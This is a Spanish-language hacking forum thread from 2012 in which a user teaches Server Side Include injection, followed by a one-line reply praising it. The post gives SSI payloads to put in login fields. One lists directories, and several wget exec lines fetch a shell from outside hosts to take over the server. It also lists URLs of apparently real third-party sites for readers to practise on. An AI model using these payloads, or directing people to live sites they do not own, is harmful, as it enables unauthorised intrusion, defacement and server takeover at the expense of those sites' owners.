Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

(Server Side Include) SSI Inyección

  • 1 Respuestas
  • 2061 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • root@xc0d3[#] ~Done
    • Ver Perfil
    • Email
« en: Junio 22, 2012, 01:19:57 pm »

(Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. el ataque permite la explotación de una aplicación web mediante la inyección de secuencias de comandos en páginas HTML o ejecutar códigos arbitrarios de forma remota .

Para este ejemplo he utilizado el comando <! - # echo var = "DATE_LOCAL" -> . Aquí hay un formulario de acceso en blanco Ahora, después de que me inyecto <! - # echo var = "DATE_LOCAL" -> en el nombre de usuario y contraseña de campo, esta salida es lo que asegura la página es vulnerable a la SSI, conforme se ejecuta el comando que he presentado en la presentación del formulario. Aquí está la salida. Ahora, yo no voy a aprovechar este servidor (no creo en la piratería sin razón), pero ahora sabiendo que el servidor es vulnerable a la SSI, que puede ejecutar un comando para subir una Shell y luego tomar el control del servidor. Comando: <! - # exec cmd = "wget http://alpavista.net/AC_RunActiveContent.js "->



<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

este comando nos permite ver los directorios




http://www.fogstock.com/bin/Cklb

con este comando nos permitirá enviar nuestra shell o exploit deface etc.

<!--#exec cmd="wget http://website.com/abc.txt" -->

http://www.fogstock.com/AC_RunActiveContent.js

https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection

http://musiclicensingstore.com/bin/Login?username= WEB PARA QUE PRACTIQUEN =D

 
« Última modificación: Junio 22, 2012, 01:24:01 pm por xc0d3 »
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 555
  • Actividad:
    0%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #1 en: Julio 11, 2012, 12:02:00 am »
Excelente tutorial man :D
Pentest - Hacking & Security Services

Contact me: arthusu@gmail.com

 

¿Te gustó el post? COMPARTILO!